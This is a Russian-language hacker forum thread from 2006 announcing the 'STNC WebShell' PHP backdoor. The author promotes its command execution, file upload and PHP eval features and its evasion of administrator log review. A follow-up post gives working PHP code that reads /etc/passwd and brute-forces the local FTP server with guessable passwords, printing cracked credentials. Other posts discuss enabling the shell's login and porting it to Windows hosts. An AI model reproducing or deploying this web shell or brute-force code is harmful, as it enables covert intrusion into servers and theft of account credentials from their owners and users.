Security Teams



» ДРУЗЬЯ: ::: Protocols.Ru ::: Grudina.INFO ::: Securityvulns.RU ::: Hack-Lab ::: ALP.org.ua :::
Страницы: (2) [1] 2  ( Перейти к первому непрочитанному сообщению ) Ответ в темуСоздание новой темы

> STNC WebShell v0.8, (c) drmist
drmist
Дата 6.05.2006 - 13:14
Цитировать сообщение
Offline



Professional
*****

Профиль
Группа: -users-
Сообщений: 1165
Пользователь №: 222
Регистрация: 14.04.2005



Рейтинг:
(0%) -----


Команда Security-Teams.Net Crew (STNC) рада представить Вам свой очередной релиз.
STNC WebShell - это php-скрипт, предназначенный для удаленного администратирования unix-систем с
выключенным safe_mode. Его характеризует оптимальное сочитание набора функций, размера, удобства и красоты
интерфеса, а также простоты.

Шелл был написан мной, возникает вопрос - зачем, если есть всеми известные r57, c99 и remview?
Затем, что я испробывал эти и многие другие шеллы и обнаружил в них массу недостатков.
Начнем с размера. Многие шеллы страдают "избыточным весом", не я один считаю, что размер 100 Кб не
оправдывает набора функций, присутствующих в большенстве существующих шеллов.

Также некоторые группы граждан желают оставлять в системе как можно меньше следов, чего не позваляют
перечисленные шеллы. О c99 и remview говорить нечего - практически все запросы передаются в них
методом GET, что незамедлительно привлекает внимание администратора системы. В r57 немного интересней.
Несмотря на то, что пользователь не видит непосредственно в адресной строке браузера get-запросов, их
можно обнаружить, заглянув в код скрипта - пользователю приходится соверщать массу get запросов за одно
обращение к с крипту. Притом ради того, чтобы загрузить пару картинок(!!).

Эти недостатки были учтены при написании STNC WebShell, что позволило добится следующих характеристик
скрипта:

* Скрипт обладает следующими функциями:

** Выполнение произвольных команд
** Редактирование текстовых файлов
** Download
** Upload
** PHP Eval()

* Комаднды отдаются скрипту одним POST запросом. НИ ОДНОГО GET, а следовательно меньше
привлекающего внимание мусора в логах
* Удобный интерфейс, напоминающий r57.
* Все это в 6 Кб кода.

Маловато? Это обусловленно тем, что скрипт расчитан ИСКЛЮЧИТЕЛЬНО для unix систем и ТОЛЬКО с
отключенным safe_mode. Как быть, если приходится работать в Windows с safe_mode? Придется подождать
наших гредущих релизов, или попользоваться пропатченным r57.
С учетом перечисленных условий, возможностей скрипта хватает для того, чтобы тварить в системе ВСЕ,
на что хватает прав. Кроме того, мы всегда готовы рассмотреть ваши предложения относительно модификации
скрипта. Например многим не хватает алиасов, и мы подумываем их добавить.

Скрипт: https://www.stnc.ru/ftpdrmist/scripts/shell.txt

(Эта тема создана не для восклиуаний типа "Респект" или "Боян". Здесь обсуждается МОДИФИКАЦИЯ сркитпа. Также здесь слудет постить eval-комадны.)
PMСайт пользователя
Top
drmist
Дата 6.05.2006 - 13:19
Цитировать сообщение
Offline



Professional
*****

Профиль
Группа: -users-
Сообщений: 1165
Пользователь №: 222
Регистрация: 14.04.2005



Рейтинг:
(0%) -----


Eval-код брутфорса локального ftp-сервера по содержимому /etc/passwd.
Проверяются аккаунты login:login и login:nigol.
Цитата
/*  /etc/passwd ftp-brute eval-code. © drmist\STNC 2006  */

set_time_limit(0);
$count = 0;

$f = file("/etc/passwd");

if(count($f) < 10)
  $f = explode("\n", `cat /etc/passwd`);

if(count($f) > 10)
{
  echo "<pre>\nWork is started...\n";
  for($i = 0; $i < count($f); $i++)
  {
    $buf = $f[$i];
   
    if(ereg("^([0-9a-zA-Z\-_]{1,})\:",$buf,$g))
    {
      $username = $g[1];
      $password = $g[1];
       
      for($i = 0; $i < 2; $i++)
      {
        $connect = ftp_connect("127.0.0.1");

        if($connect)
        {
          if(@ftp_login($connect, $username, $password))
          {
            echo "ftp://$username:$password@".$_SERVER["HTTP_HOST"]."\n";
            $count++;
          }

          ftp_close($connect);
        }
        flush();
        $password = strrev($password);
      }
    }   
  }

  echo "total: $count\n</pre>";
}
else
  echo "Error: count(\$f) < 10.";
flush();
PMСайт пользователя
Top
Скрытый
Дата 9.05.2006 - 23:21
Цитировать сообщение




Unregistered












Хотелось бы побыстрее дождаться версии шелла для Win-хостинга где включен safe-mode. Или Хотя бы узать принцип, как заточить шелл под него :).
Top
drmist
Дата 10.05.2006 - 14:29
Цитировать сообщение
Offline



Professional
*****

Профиль
Группа: -users-
Сообщений: 1165
Пользователь №: 222
Регистрация: 14.04.2005



Рейтинг:
(0%) -----


Скрытый
"Заточить" шелл не получится. Однако уже имеется очень оригинальный и удобный принцип. В настоящий момент он держится в секрете - чтобы не дай бог, кто-то до нас зарелизил.
PMСайт пользователя
Top
nerezus
Дата 10.05.2006 - 17:15
Цитировать сообщение
Offline



.:Вселенский отказник:.
***

Профиль
Группа: -users-
Сообщений: 302
Пользователь №: 265
Регистрация: 20.04.2005



Рейтинг:
(30%) XX---


Цитата
"Заточить" шелл не получится. Однако уже имеется очень оригинальный и удобный принцип. В настоящий момент он держится в секрете - чтобы не дай бог, кто-то до нас зарелизил.
модули? :)
PMICQ
Top
drmist
Дата 10.05.2006 - 18:20
Цитировать сообщение
Offline



Professional
*****

Профиль
Группа: -users-
Сообщений: 1165
Пользователь №: 222
Регистрация: 14.04.2005



Рейтинг:
(0%) -----


Цитата
модули?

госоподи упоси ))
гадать бессмысленно - раньше такого не было.
PMСайт пользователя
Top
Eternal
Дата 11.05.2006 - 05:00
Цитировать сообщение




Unregistered












чета авторизация в опере9 неработаит :help:
Top
Nickolas
Дата 11.05.2006 - 10:47
Цитировать сообщение
Offline



Specialist
****

Профиль
Группа: -users-
Сообщений: 467
Пользователь №: 2842
Регистрация: 16.02.2006



Рейтинг:
(0%) -----


Eternal
Юзайте стэбл-версии :)
PM
Top
drmist
Дата 11.05.2006 - 14:25
Цитировать сообщение
Offline



Professional
*****

Профиль
Группа: -users-
Сообщений: 1165
Пользователь №: 222
Регистрация: 14.04.2005



Рейтинг:
(0%) -----


Eternal
У Вас просто в опере не работает или в ие работает, а в опере нет?
Надеюсь, Вы раскоментировали часть кода, отвечающую за авторизацию?
то есть в коде
Цитата
/*
$login='root';
$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty")

if(!((@$_SERVER["PHP_AUTH_USER"]===$login)&&(sha1(@$_SERVER["PHP_AUTH_PW"])===$hash)))
{
header("HTTP/1.0 401 Unauthorized");
header("WWW-Authenticate: Basic");
die();
}
*/

нужно убрать первую ("/*") и последнюю ("*/") строчки.
PMСайт пользователя
Top
mulder
Дата 11.05.2006 - 14:36
Цитировать сообщение
Offline



.:in root we trust:.
*****

Профиль
Группа: -vip-
Сообщений: 1181
Пользователь №: 1151
Регистрация: 9.08.2005



Рейтинг:
(70%) XXXX-


drmist а как работать с интерактивными коммандами типа комманды смены пароля
PM
Top

Опции темы Страницы: (2) [1] 2  Ответ в темуСоздание новой темы